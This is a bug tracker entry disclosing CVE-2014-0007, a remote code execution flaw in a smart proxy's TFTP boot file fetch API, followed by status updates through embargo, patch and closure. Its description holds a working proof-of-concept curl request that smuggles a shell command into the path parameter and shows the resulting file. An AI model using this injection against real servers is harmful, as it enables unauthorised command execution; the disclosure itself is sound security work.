Actions
Bug #6086
closedCVE-2014-0007 - TFTP boot file fetch API permits remote code execution
Description
Reported by Lukas Zapletal to the security team and assigned CVE-2014-0007.
The smart proxy's API for fetching files from installation media for TFTP boot files permits remote code execution:
[root@nightly ~]# curl -3 -H "Accept:application/json" -k -X POST -d "dummy=exploit" 'https://localhost:8443/tftp/fetch_boot_file?prefix=a&path=%3Btouch%20%2Ftmp%2Fbusted%3B' [root@nightly ~]# ll /tmp/busted -rw-r--r--. 1 foreman-proxy foreman-proxy 0 Jun 5 11:13 /tmp/busted
Files
Updated by Lukas Zapletal about 11 years ago
- Status changed from New to Assigned
- Assignee set to Lukas Zapletal
- Difficulty set to trivial
Updated by Dominic Cleal about 11 years ago
- Subject changed from CVE-2014-0007 - TFTP boot file fetch API permits remote code execution to EMBARGOED: CVE-2014-0007 - TFTP boot file fetch API permits remote code execution
Updated by Lukas Zapletal about 11 years ago
- File 0001-fixes-6086-CVE-2014-0007-fixed-TFTP-boot-API-remote-.patch 0001-fixes-6086-CVE-2014-0007-fixed-TFTP-boot-API-remote-.patch added
- Difficulty changed from trivial to easy
Updated by Dominic Cleal about 11 years ago
- Translation missing: en.field_release changed from 16 to 19
Updated by Dominic Cleal almost 11 years ago
- Subject changed from EMBARGOED: CVE-2014-0007 - TFTP boot file fetch API permits remote code execution to CVE-2014-0007 - TFTP boot file fetch API permits remote code execution
- Description updated (diff)
- Private changed from Yes to No
Updated by Anonymous almost 11 years ago
- Status changed from Pending to Closed
- % Done changed from 0 to 100
Actions